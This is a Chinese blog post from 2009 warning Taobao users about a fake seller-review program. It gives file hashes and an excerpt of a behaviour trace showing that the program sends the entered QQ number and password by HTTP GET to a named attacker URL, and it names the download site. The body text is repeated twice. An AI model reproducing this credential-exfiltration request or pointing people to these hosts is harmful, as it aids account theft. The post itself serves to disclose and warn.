0
[提醒]淘宝用户,请不要使用软件“专家自动评介”
看到一则最新软件病毒验证贴,kalahan不禁倒吸一口气,特发来提醒下大家哦!
文件: E:\test\卖家自动评介\卖家自动评介.exe
大小: 786278 字节
修改时间: 2009年6月1日, 10:44:06
MD5: 3E49C841B782B07E723739FA59D028A2
SHA1: 8883A32187B4E07F75090FC8A8C660DAD2B59CC2
CRC32: D5D9CBED
软件介绍:略
登录界面:

但在点击登录时,刚才录入的用户名密码后台发送至指定位置:

……
0 http://cw63224776.w8.c361.com/tbzh/QQ.asp
0 &qqpassword=
0 ?qqnumber=
……
630231EC 00287560 2 gethostbyname Host Name: cw63224776.w8.c361.com 转换IP地址为: 127.0.0.1
6302344A 74FD0000 1 LoadLibrary wsock32
630234F8 74FB0000 1 LoadLibrary ws2_32
63026F4F 000000C0 2 send Socket: 2C8 Len: 192 Data: GET /tbzh .asp?qqnumber=13234&qqpassword=1234 HTTP/1.1\x0D\x0AUser-Agent: *****
……
lstrlen http://cw63224776.w8.c361.com/tbzh/QQ.asp?qqnumber=13234&qqpassword=1234
InternetCrackUrl http://cw63224776.w8.c361.com/tbzh/QQ.asp?qqnumber=13234&qqpassword=1234
gethostbyname Host Name: cw63224776.w8.c361.com
send Socket: 2C8 Len: 192 Data: GET /tbzh .asp?qqnumber=13234&qqpassword=1234
……
此软件,目前上传位置:http://cw63224776.ys168.com ;此不法分子注册域名、论坛注ID有一特点
有不法分子利用六一优惠活动在部分论坛发布此软件,用户在下载软件后出现异常,如淘宝帐户被冻结、异地登陆、帐户参与交易或少钱等。特提醒各位用户请停止使用,如有使用,请及时修改密码。
友情提醒:请谨慎使用此类需填写用户名、密码等信息的风险软件,后果自负。
看到一则最新软件病毒验证贴,kalahan不禁倒吸一口气,特发来提醒下大家哦!
文件: E:\test\卖家自动评介\卖家自动评介.exe
大小: 786278 字节
修改时间: 2009年6月1日, 10:44:06
MD5: 3E49C841B782B07E723739FA59D028A2
SHA1: 8883A32187B4E07F75090FC8A8C660DAD2B59CC2
CRC32: D5D9CBED
软件介绍:略
登录界面:

但在点击登录时,刚才录入的用户名密码后台发送至指定位置:

……
0 http://cw63224776.w8.c361.com/tbzh/QQ.asp
0 &qqpassword=
0 ?qqnumber=
……
630231EC 00287560 2 gethostbyname Host Name: cw63224776.w8.c361.com 转换IP地址为: 127.0.0.1
6302344A 74FD0000 1 LoadLibrary wsock32
630234F8 74FB0000 1 LoadLibrary ws2_32
63026F4F 000000C0 2 send Socket: 2C8 Len: 192 Data: GET /tbzh .asp?qqnumber=13234&qqpassword=1234 HTTP/1.1\x0D\x0AUser-Agent: *****
……
lstrlen http://cw63224776.w8.c361.com/tbzh/QQ.asp?qqnumber=13234&qqpassword=1234
InternetCrackUrl http://cw63224776.w8.c361.com/tbzh/QQ.asp?qqnumber=13234&qqpassword=1234
gethostbyname Host Name: cw63224776.w8.c361.com
send Socket: 2C8 Len: 192 Data: GET /tbzh .asp?qqnumber=13234&qqpassword=1234
……
此软件,目前上传位置:http://cw63224776.ys168.com ;此不法分子注册域名、论坛注ID有一特点
有不法分子利用六一优惠活动在部分论坛发布此软件,用户在下载软件后出现异常,如淘宝帐户被冻结、异地登陆、帐户参与交易或少钱等。特提醒各位用户请停止使用,如有使用,请及时修改密码。
友情提醒:请谨慎使用此类需填写用户名、密码等信息的风险软件,后果自负。
作者:admin@牧羊者
地址:http://www.muyangzhe.net/post/1018/
版权所有!转载时请必须遵守以链接形式署名-非商业性使用-完整方式共享!
感谢来访,欢迎留言!
写给我未来妻子的一封信(
做有意义的事,好好活着…


2009/06/06
13:11
310


